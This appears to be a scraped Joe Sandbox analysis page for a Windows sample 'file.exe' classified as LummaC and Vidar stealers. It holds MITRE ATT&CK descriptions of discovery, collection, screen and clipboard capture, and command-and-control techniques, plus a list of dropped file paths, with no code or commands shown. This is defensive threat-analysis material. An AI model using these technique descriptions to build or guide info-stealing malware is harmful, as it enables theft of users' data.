Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAECFHJEBAAF\BKECBA

C:\ProgramData\BAECFHJEBAAF\EBAFBG

C:\ProgramData\BAECFHJEBAAF\EHCAEG

C:\ProgramData\BAECFHJEBAAF\GDGHID

C:\ProgramData\BAECFHJEBAAF\GDGHID-shm

C:\ProgramData\BAECFHJEBAAF\GHJJDG

C:\ProgramData\BAECFHJEBAAF\HDGDGH

C:\ProgramData\BAECFHJEBAAF\HDGDGH-shm

C:\ProgramData\BAECFHJEBAAF\HIDAAK

C:\ProgramData\BAECFHJEBAAF\IEHJJE

Windows Analysis Report
file.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre